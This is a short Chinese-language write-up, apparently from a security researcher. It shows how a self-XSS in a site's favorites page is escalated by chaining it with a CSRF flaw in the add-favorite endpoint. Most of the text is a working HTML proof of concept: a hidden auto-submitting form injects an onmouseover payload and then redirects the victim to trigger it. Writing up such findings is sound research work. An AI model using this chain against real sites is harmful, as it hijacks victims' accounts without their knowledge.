最近遇到一个存储型xss,存在与个人中心下收藏产品中,厂商认定为self-xss

后续想怎么继续利用下,发现添加收藏的地方存在csrf漏洞

思路如下:

通过csrf添加一个xss payload 在跳转页面到收藏页面触发xss漏洞

<form action='http://xxxx.com/User/FavSite/add' method="POST" target="id_iframe"> 
	<input type="hidden" name="siteName" value="xss">
	<input type="hidden" name="siteUrl" value='http://www.test" onmouseover=alert(1) "'>
	<input type="hidden" name="note" value="xss">
</form>
<iframe id="id_iframe" name="id_iframe" style="display:none;"></iframe> 
<script type="text/javascript">
	document.forms[0].submit();
	location='http://xxxx.com/buyer/favorite_manage.html#site';
</script>